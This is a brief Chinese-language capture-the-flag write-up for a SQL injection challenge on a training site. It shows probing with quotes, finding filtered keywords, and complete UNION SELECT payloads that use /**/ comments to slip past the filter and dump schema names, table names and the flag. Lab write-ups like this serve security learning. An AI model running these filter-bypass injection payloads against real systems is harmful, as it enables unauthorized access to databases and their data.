解题链接: http://ctf5.shiyanbar.com/423/web/
解题思路:一, 输入1,不报错;输入1‘,报错;输入1‘‘,不报错。
二 , 输入1 and 1=1,返回1 1=1,可知,and被过滤了。
三, 输入1 union select,返回1 select,猜测关键词被过滤。
四, 用/**/代替空格,爆库:1‘/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/‘1‘=‘1。
五, 爆表:1‘/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/‘1‘=‘1。
六, 最后一步:1‘/**/union/**/select/**/flag/**/from/**/flag/**/where/**/‘1‘=‘1。
原文:https://www.cnblogs.com/whitehawk/p/9902576.html